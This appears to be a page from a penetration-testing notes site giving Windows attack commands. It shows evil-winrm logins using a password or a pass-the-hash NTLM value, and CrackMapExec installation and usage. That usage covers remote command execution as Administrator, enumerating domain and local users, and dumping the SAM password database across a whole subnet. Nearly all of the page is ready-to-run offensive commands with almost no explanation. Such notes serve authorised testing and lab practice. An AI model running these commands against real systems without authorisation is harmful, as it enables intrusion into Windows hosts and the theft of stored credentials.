Windows


========================Evil Winnnn : 
>>> evil-winrm -i $IP -u username  -p password
>>> evil-winrm -i $IP -u username -H <NTLM_HASH_ONLY_HASH_PART>



========================Crack Map Exec================================= 
======Intallation : 
>>> apt-get install -y libssl-dev libffi-dev python-dev build-essential
>>> git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
>>> cd CrackMapExec
>>> poetry install
>>> poetry run crackmapexec

======Commands (very few examples) : 
--> Execute 'whoami'
>>> crackmapexec $IP -u Administrator -p 'PASS' -x whoami
-->Show Domain Administrators.
>>> crackmapexec $IP -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
--> PS Version Table:
>>> crackmapexec $IP -u Administrator -p 'PASS' -X '$PSVersionTable'
--> List out Machine Users.
>>> crackmapexec $IP -u 'Administrator' -p 'PASS' --lusers
--> Dump SAM Database.
>>> crackmapexec $IP/24 -u 'Administrator' -p 'PASS' --local-auth --sam

====================================================================
PreviousAccessing Target Machine NextLinux
Last updated 3 years ago